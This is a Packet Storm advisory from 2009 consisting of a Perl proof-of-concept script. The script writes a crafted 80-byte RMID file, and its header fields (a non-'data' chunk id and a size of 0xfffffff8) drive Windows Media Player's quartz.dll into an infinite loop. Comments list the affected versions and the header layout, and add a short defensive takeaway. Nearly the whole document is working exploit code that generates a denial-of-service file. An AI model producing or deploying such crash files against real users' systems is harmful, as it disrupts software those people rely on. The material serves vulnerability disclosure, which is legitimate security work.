Microsoft Media Player Denial Of Service

2009-04-17T00:00:00
ID PACKETSTORM:76771
Type packetstorm
Reporter vulnhunt.com
Modified 2009-04-17T00:00:00

Description

                                        
                                            `#! /usr/bin/perl  
# CAL_quartz_mid_poc.pl  
#  
# Microsoft_Media_player_quartz.dll_mid_remote_Dos POC  
# by Code Audit Labs public 2009-04-17  
# http://www.vulnhunt.com/  
#  
#Affected  
#========  
#tested on fully updated winxp sp3  
#windows media Player 10.00.00.3998 quartz.dll 6.5.3790.4283  
#Windows Media Player 11.0.5721.5230 quartz.dll 6.5.2600.5596  
  
#other versions should be affected  
  
# CVE: please assign a CVE id to this issue  
#  
#ANALYSIS  
#========  
# A vulnerability exists in the quartz.dll code that processes the RMID header.  
# The header struct has the following layout:  
#{  
# char riff_id[4]; //'RIFF'  
# DWORD rmid_size;  
# char rmid_id[4]; //'RMID'  
# char data_id[4]; //not equal to 'data'  
# DWORD midi_size;   
#}  
#If data_id is not 'data' and midi_size is 0xfffffff8,  
#the code falls into an infinite loop.  
  
#  
  
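# Write the 80-byte RMID sample described in the ANALYSIS header to poc.mid.
#
# Leading fields of the sample (DWORDs are little-endian), following the
# struct in the header comment:
#   "RIFF"       riff_id
#   0x0000ffff   rmid_size
#   "RMID"       rmid_id
#   "dddd"       data_id   -- deliberately not "data"
#   0xfffffff8   midi_size
# The remainder is an "MThd" tag followed by 0xff/0xf8 filler bytes.
#
# Defensive takeaway: a chunk parser should reject any chunk size larger
# than the bytes remaining in the file and must guarantee forward progress
# on every loop iteration.
# NOTE(review): 8 + 0xfffffff8 wraps to 0 in 32-bit arithmetic, which is
# presumably why the affected loop never advances -- the advisory does not
# confirm the root cause.

# Three-arg open with a lexical handle: the mode can never be taken from
# the file name, and the handle is scoped instead of a package bareword.
open(my $out, '>', "poc.mid") or die "can't create crash sample.$!";

# Raw bytes only; no newline or encoding translation on any platform.
binmode($out) or die "can't set binary mode on crash sample.$!";

my $data =
    "\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64" .
    "\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8" .
    "\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
    "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
    "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

print {$out} $data or die "can't write crash sample.$!";

# Buffered write errors only surface at close, so check it.
close($out) or die "can't close crash sample.$!";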
  
  
`